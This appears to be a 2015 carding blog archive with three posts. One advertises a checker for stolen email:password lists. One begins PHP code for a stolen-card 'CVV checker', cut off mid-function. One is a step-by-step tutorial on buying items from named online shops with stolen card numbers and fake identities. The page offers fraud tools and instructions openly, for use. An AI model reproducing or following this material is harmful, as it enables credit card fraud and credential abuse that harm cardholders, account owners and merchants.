Posts

Showing posts from February, 2015

Email Checker - Asec-Check v1 By Security Alshaab

Image
UPLOAD YOUR EMAILS THIS TYPE :- EMAIL:PASSWORD TOOL WORKING 100% I TEST TO   SCAN REPORT DOWNLOAD LINK

CVV Checker (Visa & Mastercard)

Save it as something.php upload it a host and check PHP Code: <?php ob_start (); @ session_start (); set_time_limit ( 0 ); function  _curl ( $url , $post = "" , $usecookie  =  false ) {       $ch  =  curl_init ();     if( $post ) {          curl_setopt ( $ch ,  CURLOPT_POST  , 1 );          curl_setopt  ( $ch ,  CURLOPT_POSTFIELDS ,  $post );     }      curl_setopt ( $ch ,  CURLOPT_URL ,  $url );      curl_setopt ( $ch ,  CURLOPT_FOLLOWLOCATION ,  1 );      curl_setopt ( $ch ,  CURLOPT_USERAGENT ,  "Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3" );      curl_setopt ( $ch ,  CURLOPT_SSL_VERIFYPEER ,  false );      curl_setopt ( $ch ,  CURLOPT_SSL_VERIFYHOST ,  0 );     if ( $usecookie ) {      curl_setopt ( $ch ,  CURLOPT_COOKIEJAR ,  $usecookie );      curl_setopt ( $ch ,  CURLOPT_COOKIEFILE ,  $usecookie );        }      curl_setopt ( $ch ,  CURLOPT_RETURNTRANSFER , 1 );      $result = curl_exec  ( $ch );      curl_close 

[Tutorial] Use Credit Card Without CVV Number

Image
Hello guys, lets say if you found some credit card info, but doesn't have CVV number. But, theres still a chance to use the credit card. You need to find a site that doesn't required CVV to purchase the item. Example of the sites that does not required CVV are Amazon, Fishpond, Vistaprint, VictoriaStreet and more. Before we proceed to the tutorial, you will need to have these information: Name on Card Credit Card Number Expiration Date 1- First of all. go to the site you wanna go shop, in my case, I will use  http://www.amazon.com . 2- Make a new account  3- You will be redirected to the registration page. Now, open  http://www.fakenamegenerator.com  in a new tab. And generate a new ID 4- Click to activate your email and you will be redirected to your email inbox 5- Now use all the details as your account info at Amazon 6- Click on Create account, and you will rediected to the home page of Amazon. 7- Now, search anything you wanna buy and click Add to Cart > Proceed to Check